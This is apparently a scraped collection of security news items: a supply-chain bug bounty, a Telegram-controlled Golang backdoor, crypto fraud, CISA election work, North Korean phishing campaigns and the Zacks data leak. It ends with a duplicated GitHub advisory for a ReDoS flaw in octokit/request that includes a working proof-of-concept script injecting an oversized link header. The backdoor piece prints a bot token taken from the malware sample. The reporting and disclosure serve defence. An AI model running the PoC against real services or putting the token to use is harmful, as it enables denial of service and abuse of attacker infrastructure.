Researchers earned a $50,500 Bug Bounty after uncovering a critical supply chain flaw in a newly acquired firm,…

Researchers earned a $50,500 **Bug Bounty** after uncovering a critical supply chain flaw in a newly acquired firm, highlighting security risks in business acquisitions.

Two cybersecurity researchers have walked away with a $50,500 bug bounty after finding a critical vulnerability in a major company’s software supply chain. The exploit targeted a recently acquired company, exposing a flaw that could have widespread ramifications.

The duo, Lupin (Roni Carta) and Snorlhax, have a history of collaboration; recently turned their focus to the often-overlooked area of business acquisitions. They noticed that these integrations frequently present security gaps as newly acquired entities may not always uphold the same rigorous security standards as their parent companies. This insight guided their hunt for a “game-changing” vulnerability.

Their approach began with a detailed examination of the acquired company’s online presence, including its code repositories and package registries. The researchers employed advanced techniques, transforming JavaScript files into Abstract Syntax Trees (ASTs) and Docker image analysis to identify dependencies and uncover possible flaws. This investigation led them to a DockerHub organization linked to the acquisition.

The real breakthrough occurred after the researchers downloaded and examined a Docker image. Inside, they discovered the complete source code for the company’s backend systems. But the story did not end there, as the researchers unearthed even more sensitive information.

According to Lupin’s technical blog post, the duo discovered that a “.git” folder was still included in the image. Within the folder, they found an authorization token for GitHub Actions (GHS). This token, if exploited, could have given the attacker the capability to manipulate the company’s build pipelines. The token could have allowed them to inject malicious code, tamper with software releases, or even gain access to additional repositories.

Further investigation revealed that the Docker image had removed the .npmrc configuration file, but the researchers recognized that earlier layers of the image could still hold traces of it. They leveraged tools like Dive and Dlayer to explore these layers, ultimately locating a private npm token. This token provided read-and-write access to the target company’s private packages.

The team realized they now had a path to insert malicious code into one of the private packages, which the company’s developers, pipelines, and production systems would then automatically fetch. Since these were private packages, the attack would bypass security scans, enabling them to compromise systems at every level leading to large-scale data theft and data breaches.

Software supply chain vulnerabilities have affected thousands of businesses in recent months. Cyberattacks targeting companies like Snowflake Inc., Blue Yonder, and MOVEit Transfer continue to be exploited, impacting organizations worldwide.

The good news is that the duo documented their findings and demonstrated the vulnerability’s impact to the impacted company’s security team. Their report outlined how attackers could use a poisoned npm package to harvest secrets, infiltrate into internal systems, and compromise CI/CD pipelines. As a result, the company awarded the researchers a $50,500 bug bounty, recognizing the severity of the vulnerability.

This incident shows how attacks can succeed when multiple overlooked flaws come together. In this case, the issue originated from software supply chain gaps and security flaws in a newly acquired company. The team pointed out the importance of securing every part of the build process, from the code itself to the components and external packages involved. It’s an example of how protecting a software development pipeline isn’t simple; it requires careful attention to every detail.

1.  Multichain hack: Hacker returns $1m, keeps $150k as bug bounty
2.  Apple Launches ‘Apple Intelligence’ – $1M Bug Bounty for Security
3.  Google Launches $250,000 kvmCTF Bug Bounty for KVM Exploits

Duo Wins $50K Bug Bounty for Supply Chain Flaw in Newly Acquired Firm

People around the world learned about the latest advancements in the American space industry! This was made possible…

People around the world learned about the latest advancements in the American space industry! This was made possible by Holiverse, a decentralized digital platform built on the Polygon blockchain, which organized a live broadcast on February 8 from NASA’s Kennedy Space Center (Florida, USA), covering the event dedicated to the launch of the memory capsule to the Moon alongside the privately developed Peregrine lunar lander.

This compact lunar “cargo carrier” embarked on its journey carrying scientific instruments, NASA’s equipment, and cultural artefacts including a digital copy of the U.S. Constitution.

****The Historical Significance of the Lunar Mission****

The mission was launched in January from Cape Canaveral, Florida, aboard a SpaceX Falcon 9 rocket. The initiative to send a digital copy of the U.S. Constitution to the Moon was led by Copernic Space co-founder Grant Blaisdell. In collaboration with Spacebit founder Pavlo Tanasyuk, they later plan to send a physical copy of the key American legal document to Earth’s natural satellite.

According to the innovators, this mission is essential for preserving humanity’s legacy. “Our project represents a symbolic bridge between America’s past and its promising future, ensuring that the principles of freedom and democracy remain unchanged, even beyond Earth,” says Pavlo Tanasyuk.

****The U.S. Constitution on the Moon: Holiverse Made the Presentation Accessible to a Global Audience****

On February 8, 2025, Holiverse partnered with Spacebit to present a specially crafted physical copy of the U.S. Constitution at Cape Canaveral, prepared for its upcoming lunar mission. To ensure that this milestone was seen by more than just the event’s invited guests, Holiverse hosted a live video broadcast on its platform. Thanks to modern technology, people from around the world could take part in this historic moment, regardless of their location.

The celebratory evening was dedicated to showcasing the collaborative efforts behind this groundbreaking mission. The audience was also introduced to the next steps in lunar and space exploration.

****Future Prospects and Plans****

Scientists and engineers continue to advance their work. By the end of 2025, a team of space industry partners plans to send a physical copy of the U.S. Constitution to the Moon as part of an upcoming mission. Active preparations are underway, with the document being placed in a capsule made from high-strength materials capable of withstanding the extreme conditions of space.

This scientific mission is taking on profound historical significance by preserving cultural heritage beyond Earth. The memory capsule, an extraordinary “lunar archive,” also contains photographs, children’s messages from multiple countries, and drawings.

Holiverse Makes NASA’s Latest Achievements Accessible to Everyone

The new Golang backdoor uses Telegram for command and control. Netskope discovers malware that exploits Telegram’s API for…

The new Golang backdoor uses Telegram for command and control. Netskope discovers malware that exploits Telegram’s API for malicious purposes. Learn how this threat works and how to protect yourself.  

Cybersecurity researchers at Netskope have discovered a new, functional, but possibly still-in-development, Golang-based backdoor that uses Telegram for command and control (C2).

This malware (Trojan.Generic.37477095), apparently of Russian origin, takes advantage of cloud services like Telegram, which are easy for attackers to use and difficult for researchers to monitor. This method of C2 communication avoids the need for dedicated attacker infrastructure. Other cloud platforms like OneDrive, GitHub, and Dropbox could also be misused in this way.

Upon execution, the malware, compiled in Go, initiates an “installSelf” function. This function checks if the malware is running from the designated location and filename: “C:\\Windows\\Temp\\svchost.exe”. If it does not, the malware copies itself to that location, creates a new process to launch the copy, and then terminates the original instance. This process, executed in an initialization function, ensures the malware runs from the intended location before proceeding. 

Detect It Easy tool used by researchers shows malware acting like a backdoor upon execution (Screenshot via Netskope)

For C2 communication, the backdoor employs an open-source Go package to interact with Telegram. It establishes a bot instance using the Telegram BotFather feature and a specific token (8069094157:AAEyzkW\_3R3C-tshfLwgdTYHEluwBxQnBuk in the analysed sample). The malware then monitors a designated Telegram chat for new commands.

The malware supports four commands, but only three are currently implemented. It validates the length and content of received messages before execution. The “/cmd” command requires two messages: the command itself, followed by a PowerShell command to be executed.

In the next phase, the malware sends a Russian-language prompt (“Enter the command:”) to the chat after receiving the initial command and then waits for the subsequent PowerShell command. This command is then executed in a hidden PowerShell window. 

The “/persist” command replicates the initial installation check and process, relaunching the malware and exiting. The “/screenshot” command, while not fully implemented, still sends a “Screenshot captured” message to the Telegram channel. 

The “/selfdestruct” command deletes the malware file (C:\\Windows\\Temp\\svchost.exe) and terminates the process, notifying the Telegram channel with a “Self-destruct initiated” message. All command outputs are transmitted back to the Telegram channel via the “sendEncrypted” function.

This exploitation of cloud applications for malicious purposes highlights the challenges faced by defenders.

“Although the use of cloud apps as C2 channels is not something we see every day, it’s a very effective method used by attackers not only because there’s no need to implement a whole infrastructure for it, making attackers’ lives easier, but also because it’s very difficult, from a defender perspective, to differentiate what is a normal user using an API and what is a C2 communication,” researchers noted in their technical blog post.

To stay protected, ensure you have up-to-date and reputable antivirus and anti-malware software installed on all your devices. These solutions should be capable of detecting and blocking malicious files, including Go-based executables.

Hackers Exploit Telegram API to Spread New Golang Backdoor

Two Estonian nationals plead guilty to a $577M cryptocurrency Ponzi scheme through HashFlare, defrauding hundreds of thousands globally.…

Two Estonian nationals plead guilty to a $577M cryptocurrency Ponzi scheme through HashFlare, defrauding hundreds of thousands globally. They face 20 years in prison and forfeit $400M in assets.

The US Department of Justice (DoJ) has confirmed that two Estonian nationals have admitted guilt in a large-scale cryptocurrency fraud case that impacted numerous victims worldwide. The perpetrators, identified as Sergei Potapenko and Ivan Turõgin, both 40 years old, were originally arrested in November 2022 and extradited to the US in May 2024. 

They, reportedly, ran a cryptocurrency fraud scheme that amassed over $577 million between 2015 and 2019. This substantial sum was obtained by misleading investors about the capabilities of their purported cryptocurrency mining service, HashFlare.io.

HashFlare’s homepage (Screenshot credit: Hackread.com)

According to the DoJ’s press release, Potapenko and Turõgin operated a complex Ponzi scheme (a scam where insanely high returns are offered with minimal effort) involving cryptocurrency mining services. They marketed contracts to investors, promising a portion of the cryptocurrency generated by HashFlare. 

Over the four-year period, this operation amassed a substantial sum of money, exceeding half a billion dollars. The scheme victimized hundreds of thousands of individuals across the globe, including those in the United States.

The perpetrators employed sophisticated methods to deceive investors. The fraudulent activity involved a discrepancy between the promised mining capacity and the actual resources available. HashFlare lacked the necessary computing power to conduct extensive mining for clients. Operators, therefore, fabricated data on a web platform to show investors their supposed profits, misappropriating funds for their own benefit. 

This means, they not only misrepresented their mining capacity but also created a false impression of profitability through fabricated data. They used the illicitly gained funds to acquire luxury items, including real estate and high-end vehicles and also invested in cryptocurrency and other assets.  

While the figure of $577 million represents the total sales generated by the fraudulent scheme, it is important to note that the defendants agreed to forfeit assets worth over $400 million as part of their plea deal. This indicates the scale of the financial gains they acquired through the scheme. These recovered funds will be used to reimburse those who were harmed by the fraudulent scheme, and the process will be revealed by the DoJ at a later date.

Potapenko and Turõgin have pleaded guilty to conspiracy to commit wire fraud, which involves a maximum sentence of 20 years. They will be sentenced on May 8 and their sentencing depends on various factors, including federal guidelines and other relevant legal considerations. 

The DoJ commended Estonia’s Cybercrime Bureau, the Estonian Prosecutor General, and the Ministry of Justice and Digital Affairs for their assistance in the investigation and extradition process. The FBI is actively urging victims of the HashFlare fraud to come forward.

Featured Image via: PixaBay/Sergei Tokmakov

HashFlare Fraud: Two Estonians Admit to Running $577M Crypto Scam

A list of topics we covered in the week of February 10 to February 16 of 2025

February 14, 2025 - A cybercriminal stole a reported 12 million data records on Zacks’ customers and clients.

February 13, 2025 - Scammers are once again using AI to take over Gmail accounts.

February 12, 2025 - Etsy sellers are being targeted by scammers that use a legitimate Etsy domain to host their dodgy PDFs.

February 11, 2025 - Apple has released an out-of-band security update for a vulnerability which it says may have been exploited in an "extremely sophisticated attack against specific targeted individuals.”

February 11, 2025 - Android phishing apps are the latest, critical threat for Android users, putting their passwords in danger of new, sneaky tricks of theft.

 A week in security (February 10 &#8211; February 16) 

The US Cybersecurity and Infrastructure Security Agency has frozen efforts to aid states in securing elections, according to an internal memo viewed by WIRED.

The Cybersecurity and Infrastructure Security Agency has frozen all of its election security work and is reviewing everything it has done to help state and local officials secure their elections for the past eight years, WIRED has learned. The move represents the first major example of the country’s cyberdefense agency accommodating President Donald Trump’s false claims of election fraud and online censorship.

In a memo sent Friday to all CISA employees and obtained by WIRED, CISA’s acting director, Bridget Bean, said she was ordering “a review and assessment” of every position at the agency related to election security and countering mis- and disinformation, “as well as every election security and \[mis-, dis-, and malinformation\] product, activity, service, and program that has been carried out” since the federal government designated election systems as critical infrastructure in 2017.

“CISA will pause all elections security activities until the completion of this review,” Bean added. The agency is also cutting off funding for these activities at the Elections Infrastructure Information Sharing & Analysis Center, a group funded by the Department of Homeland Security (DHS) that has served as a coordinating body for the elections community.

In her memo, Bean confirmed that CISA had, as first reported by Politico, placed employees “initially identified to be associated with the elections security activities and the MDM program” on administrative leave on February 7.

“It is necessary to rescope the agency's election security activities to ensure CISA is focused exclusively on executing its cyber and physical security mission,” she told employees in the memo.

While Bean is temporarily leading CISA, she is officially the agency’s executive director, its top career position. CISA’s first director created the executive-director role to provide continuity during political transitions. Previously, Bean was a Trump appointee at the Federal Emergency Management Agency during his first term.

In justifying CISA’s internal review, which will conclude on March 6, Bean pointed to Trump’s January 20 executive order on “ending federal censorship.” Conservatives have argued that CISA censored their speech by coordinating with tech companies to identify online misinformation in 2020, during the final year of Trump’s first term. CISA has denied conducting any censorship, and the US Supreme Court dismissed a lawsuit over the government’s work. But in the wake of the backlash, CISA halted most conversations with tech platforms about online mis- and disinformation.

CISA and DHS did not immediately respond to requests for comment.

Since 2017, state and local election officials have relied on CISA’s expertise and resources—as well as its partnerships with other agencies—to improve their physical and digital security. Through on-site consultations and online guidance, CISA has helped election administrators secure voting infrastructure against hackers, harden polling places against active shooters, and create polling-place backup plans to deal with ballot shortages or power outages.

Election supervisors have always struggled to overcome serious funding challenges, but in recent years, their jobs have become even more stressful as intense voter scrutiny has given way to harassment and even death threats. Election officials of both parties have repeatedly praised CISA for its apolitical support of their work, saying the agency’s recommendations and free security services have been critical in boosting their own efforts.

But that bipartisan accord began fraying after the 2020 election, as some conservative election officials started criticizing the agency for its focus on mis- and disinformation. Congressional Republicans joined the fray as well, calling CISA “the nerve center of the federal government’s domestic surveillance and censorship operations on social media.” Their rhetoric echoed Trump’s own history of election denialism, which involved false claims of rigged voting machines and mass voter fraud and culminated in Trump supporters’ January 6, 2021, attack on the US Capitol.

With conservatives pushing to axe CISA’s election security mission, Trump’s election last November virtually guaranteed an end to that program, and employees have been bracing for retaliation against the people who participated in that work.

Bean’s memo indicates that CISA’s internal review will cover every agency position related to election security, as well as performance plans for employees involved in that work; all support services provided to the election community; and all election security guidance and publications. Bean wrote that CISA will describe any steps necessary to “correct any activities identified as past misconduct by the Federal Government related to censorship of protected speech,” including eliminating programs or roles.

After CISA completes its review, the agency will submit a report to the White House addressing how it plans to “deliver a more focused provision of services for elections security activities,” Bean told employees. The report will focus on three goals: streamlining the election security services that CISA offers to state and local governments, ensuring that its activities align with its new “mandate to refocus” on its core mission, and removing “all personnel, contracts, grants, programs, products, services, and activities” that conflict with Trump’s anti-censorship directive or exceed CISA’s authorities.

It is unclear if White House officials or DHS secretary Kristi Noem directly ordered Bean to launch the election security investigation or if she independently determined that Trump’s executive order necessitated it. The January 20 directive does instruct the attorney general to work with other agency leaders to investigate Biden-administration activities that are “inconsistent” with Trump’s vow to end online censorship, but it makes no mention of activities prior to Biden’s term, including CISA’s 2020 election work.

Top US Election Security Watchdog Forced to Stop Election Security Work

A phishing attack dubbed DEEP#DRIVE is targeting South Korean entities, with thousands already affected. North Korean hackers from…

A phishing attack dubbed DEEP#DRIVE is targeting South Korean entities, with thousands already affected. North Korean hackers from the Kimsuky group are the prime suspects behind this cyber espionage campaign.

Securonix has shared its investigation into the DEEP#DRIVE attack campaign, a multi-stage operation targeting South Korean businesses, government entities, and cryptocurrency users since September 2024. The attack’s primary objective is most likely espionage to gather sensitive information from South Korean entities and has already claimed thousands of victims.

The investigation shared with Hackread.com ahead of its publishing, reveals that attackers employed _tailored phishing lures_ written in Korean and disguised as legitimate documents, such as work logs, insurance documents, and crypto-related files, to successfully infiltrate targeted environments. 

Securonix has shared an image of a phishing lure disguised as the Telegram.exe application, labelled 대차 및 파레트 (Korean term for bogie and pallet) revealing logistics-related details like product name (제품명), P9 basement factory (P9 지하공장), total weight (총중량), etc., indicating a likely attempt to trick victims in the logistics sector.

These lures, crafted to appeal to their intended audience, were often distributed in trusted file formats like .hwp, .xlsx, and .pptx and hosted on widely used platforms like Dropbox, allowing attackers to evade traditional security defences and “blend into normal user behaviour.”

“It is evident that phishing was the primary method of malware distribution in this campaign as the collected samples and their filenames strongly align with common themes and wording typically used in phishing lures” Secrounix’s researchers explained in their report.

****Campaign Analysis****

The campaign heavily leveraged PowerShell scripts for payload delivery, reconnaissance (gathering system info like IP address, OS details, antivirus software, and running processes), and establishing persistence (using scheduled tasks like “ChromeUpdateTaskMachine”). Dropbox was also used for data exfiltration.  

The attack chain typically begins with a .lnk file disguised as a legitimate document, which initiates the execution of malicious PowerShell scripts. These scripts download further payloads, including a .NET assembly, disguised as a legitimate application (such as “Telegram.exe”), and establish persistence. A key reconnaissance script, “system\_first.ps1,” collects and exfiltrates system information.  

The final payload, often delivered via a script like “temp.ps1,” is suspected to be a backdoor, though researchers could not capture it during analysis. The attackers’ Dropbox account analysis showed a large number of compromised system configuration files and various malicious payloads.

Stealth and obfuscation are key elements, with attackers using techniques like meaningless variable names, repeated irrelevant assignments, and string concatenation to evade detection, and the removal of associated Dropbox links suggests the attack infrastructure was temporary. 

Although the attacker’s infrastructure, particularly Dropbox links, appeared short-lived, the tactics, techniques, and procedures (TTPs) strongly resemble those used by Kimsuky, a North Korean Advanced Persistent Threat (APT) group “known for targeting South Korea and using similar Dropbox-based methods in previous campaigns,” researchers observed.

Securonix recommends user education on phishing, monitoring of malware staging directories, and reliable endpoint logging (e.g. PowerShell logging) to defend against similar attacks.

N. Korean Hackers Suspected in DEEP#DRIVE Attacks Against S. Korea

The North Korean threat actor known as the Lazarus Group has been linked to a previously undocumented JavaScript implant named Marstech1 as part of limited targeted attacks against developers.
The active operation has been dubbed Marstech Mayhem by SecurityScorecard, with the malware delivered by means of an open-source repository hosted on GitHub that's associated with a profile named "

Lazarus Group Deploys Marstech1 JavaScript Implant in Targeted Developer Attacks

A cybercriminal stole a reported 12 million data records on Zacks’ customers and clients.

A cybercriminal claimed to have stolen 15 million data records from the customers and clients of the company Zacks—a number that a separate investigation, after analysis, shaved down to just 12 million.

Zacks is an investment research company best known for its “Zacks Ranks,” which are daily lists that provide stock market watchers and likely investors with possible company portfolio purchases, ranked on a scale from one to five.

Over the years Zacks has suffered a few data breaches. In 2023, data allegedly belonging to Zacks containing 8,615,098 records was leaked online. The most recent data in this database is from May 2020. The data contains names, email addresses, usernames, passwords, phone numbers, addresses, company names, and additional personal information. This leak is being publicly shared on online forums.

In October 2024, we found data reported to belong to Zacks containing 8,441 records which includes email addresses, physical addresses, phone numbers, and full names, and potentially other compromised user details. This breach is also being publicly shared on the internet.

Now, a cybercriminal using the monicker Jurak, leaked sensitive information related to roughly 12 million accounts, which allegedly stems from a breach that happened last year.

Cybercriminals leaks data allegedly stolen from Zacks

> “In June 2024, Zacks Investment Research suffered a data breach exposing their source code and their databases containing 15M lines of their customers and clients. This would be the 2nd (hacked back in 2020) major data breach for Zacks.
> 
> The data leaked in this thread contains usernames, emails, addresses, full names, phone numbers.
> 
> I thought about releasing the source code, but I don’t want every retard to have access to it. If you have high reputation and want the source code send a PM
> 
> Breached by @**Jurak** and @StableFish
> 
> Below is a sample of the customers database:
> 
> CLUE , HINT , PASSWORD , USERNAME , LAST\_NAME , FIRST\_NAME , CUSTOMER\_ID , DATE\_REGISTERED , DATE\_UPDATED , DISPLAY\_NAME , FIRM\_NAME , TIMEZONE\_CODE , LAST\_PASSWORD\_CHANGE”

BleepingComputer says it has reached out to Zacks on several occasions but didn’t get a response. As with other recent claims by criminals on BreachForums we have to be careful to take their word for anything, but Jurak claims they breached Zacks themselves in June 2024.

“I breached Zacks myself”

Jurak told BleepingComputer that they gained access to the company’s active directory as a domain admin and then stole source code for the main site (Zacks.com) and 16 other websites, including some internal websites. They also shared samples of the source code they had stolen as proof of the new breach.

**Protecting yourself after a data breach**

Losing data related to a financial account can have severe consequences. There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication (2FA).** If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Consider not storing your card details**. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
*   **Set up identity monitoring.** Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

**Check your digital footprint**

If you want to find out what personal data of yours has been exposed online, you can use our free Digital Footprint scan. Fill in the email address you’re curious about (it’s best to submit the one you most frequently use) and we’ll send you a free report.

 12 Million Zacks accounts leaked by cybercriminal 

### Summary
The regular expression `/<([^>]+)>; rel="deprecation"/` used to match the `link` header in HTTP responses is vulnerable to a ReDoS (Regular Expression Denial of Service) attack. This vulnerability arises due to the unbounded nature of the regex's matching behavior, which can lead to catastrophic backtracking when processing specially crafted input. An attacker could exploit this flaw by sending a malicious `link` header, resulting in excessive CPU usage and potentially causing the server to become unresponsive, impacting service availability.
### Details
The vulnerability resides in the regular expression `/<([^>]+)>; rel="deprecation"/`, which is used to match the `link` header in HTTP responses. This regular expression captures content between angle brackets (`<>`) followed by `; rel="deprecation"`. However, the pattern is vulnerable to ReDoS (Regular Expression Denial of Service) attacks due to its susceptibility to catastrophic backtracking when processing malicious input.
An attacker can exploit this vulnerability by sending a specially crafted `link` header designed to trigger excessive backtracking. For example, the following headers:
```js
fakeHeaders.set("link", "<".repeat(100000) + ">");
fakeHeaders.set("deprecation", "true");
```
The crafted `link` header consists of 100,000 consecutive `<` characters followed by a closing `>`. This input forces the regular expression engine to backtrack extensively in an attempt to match the pattern. As a result, the server can experience a significant increase in CPU usage, which may lead to denial of service, making the server unresponsive or even causing it to crash under load.
The issue is present in the following code:
```js
const matches = responseHeaders.link && responseHeaders.link.match(/<([^>]+)>; rel="deprecation"/);
```
In this scenario, the `link` header value triggers the regex to perform excessive backtracking, resulting in resource exhaustion and potentially causing the service to become unavailable.

### PoC
[The gist of PoC.js](https://gist.github.com/ShiyuBanzhou/2afdabf0fc4cb6cfbd3b1d58b6082f6a)
1. run npm i @octokit/request
2. run 'node poc.js'
result:
3. then the program will stuck forever with high CPU usage
```js
import { request } from "@octokit/request";
const originalFetch = globalThis.fetch;
globalThis.fetch = async (url, options) => {
  const response = await originalFetch(url, options);
  const fakeHeaders = new Headers(response.headers);
  fakeHeaders.set("link", "<".repeat(100000) + ">");
  fakeHeaders.set("deprecation", "true");
  return new Response(response.body, {
    status: response.status,
    statusText: response.statusText,
    headers: fakeHeaders
  });
};
request("GET /repos/octocat/hello-world")
  .then(response => {
    // console.log("[+] Response received:", response);
  })
  .catch(error => {
    // console.error("[-] Error:", error);
  });
// globalThis.fetch = originalFetch;
```
### Impact
This is a *Denial of Service (DoS) vulnerability* caused by a *ReDoS (Regular Expression Denial of Service)* flaw. The vulnerability allows an attacker to craft a malicious `link` header that exploits the inefficient backtracking behavior of the regular expression used in the code.
The primary impact is the potential for *server resource exhaustion*, specifically high CPU usage, which can cause the server to become unresponsive or even crash when processing the malicious request. This affects the availability of the service, leading to downtime or degraded performance.
The vulnerability impacts any system that uses this specific regular expression to process `link` headers in HTTP responses. This can include:
* Web applications or APIs that rely on parsing headers for deprecation information.
* Users interacting with the affected service, as they may experience delays or outages if the server becomes overwhelmed.
* Service providers who may face disruption in operations or performance degradation due to this flaw.
If left unpatched, the vulnerability can be exploited by any unauthenticated user who is able to send a specially crafted HTTP request with a malicious `link` header, making it a low-barrier attack that could be exploited by anyone.

**Summary**

The regular expression /<([^>]+)>; rel="deprecation"/ used to match the link header in HTTP responses is vulnerable to a ReDoS (Regular Expression Denial of Service) attack. This vulnerability arises due to the unbounded nature of the regex's matching behavior, which can lead to catastrophic backtracking when processing specially crafted input. An attacker could exploit this flaw by sending a malicious link header, resulting in excessive CPU usage and potentially causing the server to become unresponsive, impacting service availability.

**Details**

The vulnerability resides in the regular expression /<([^>]+)>; rel="deprecation"/, which is used to match the link header in HTTP responses. This regular expression captures content between angle brackets (<>) followed by ; rel="deprecation". However, the pattern is vulnerable to ReDoS (Regular Expression Denial of Service) attacks due to its susceptibility to catastrophic backtracking when processing malicious input.  
An attacker can exploit this vulnerability by sending a specially crafted link header designed to trigger excessive backtracking. For example, the following headers:

fakeHeaders.set("link", "<".repeat(100000) + ">");
fakeHeaders.set("deprecation", "true");

The crafted link header consists of 100,000 consecutive < characters followed by a closing >. This input forces the regular expression engine to backtrack extensively in an attempt to match the pattern. As a result, the server can experience a significant increase in CPU usage, which may lead to denial of service, making the server unresponsive or even causing it to crash under load.  
The issue is present in the following code:

const matches \= responseHeaders.link && responseHeaders.link.match(/<(\[^\>\]+)\>; rel\="deprecation"/);

In this scenario, the link header value triggers the regex to perform excessive backtracking, resulting in resource exhaustion and potentially causing the service to become unavailable.

**PoC**

The gist of PoC.js

1.  run npm i @octokit/request
2.  run 'node poc.js'  
    result:
3.  then the program will stuck forever with high CPU usage

import { request } from "@octokit/request";
const originalFetch \= globalThis.fetch;
globalThis.fetch \= async (url, options) \=> {
  const response \= await originalFetch(url, options);
  const fakeHeaders \= new Headers(response.headers);
  fakeHeaders.set("link", "<".repeat(100000) + ">");
  fakeHeaders.set("deprecation", "true");
  return new Response(response.body, {
    status: response.status,
    statusText: response.statusText,
    headers: fakeHeaders
  });
};
request("GET /repos/octocat/hello-world")
  .then(response \=> {
    // console.log("\[+\] Response received:", response);
  })
  .catch(error \=> {
    // console.error("\[-\] Error:", error);
  });
// globalThis.fetch = originalFetch;

**Impact**

This is a _Denial of Service (DoS) vulnerability_ caused by a _ReDoS (Regular Expression Denial of Service)_ flaw. The vulnerability allows an attacker to craft a malicious link header that exploits the inefficient backtracking behavior of the regular expression used in the code.  
The primary impact is the potential for _server resource exhaustion_, specifically high CPU usage, which can cause the server to become unresponsive or even crash when processing the malicious request. This affects the availability of the service, leading to downtime or degraded performance.  
The vulnerability impacts any system that uses this specific regular expression to process link headers in HTTP responses. This can include:

*   Web applications or APIs that rely on parsing headers for deprecation information.
*   Users interacting with the affected service, as they may experience delays or outages if the server becomes overwhelmed.
*   Service providers who may face disruption in operations or performance degradation due to this flaw.  
    If left unpatched, the vulnerability can be exploited by any unauthenticated user who is able to send a specially crafted HTTP request with a malicious link header, making it a low-barrier attack that could be exploited by anyone.

**References**

*   GHSA-rmvr-2pp2-xj38
*   octokit/request.js@34ff07e

Tag

#git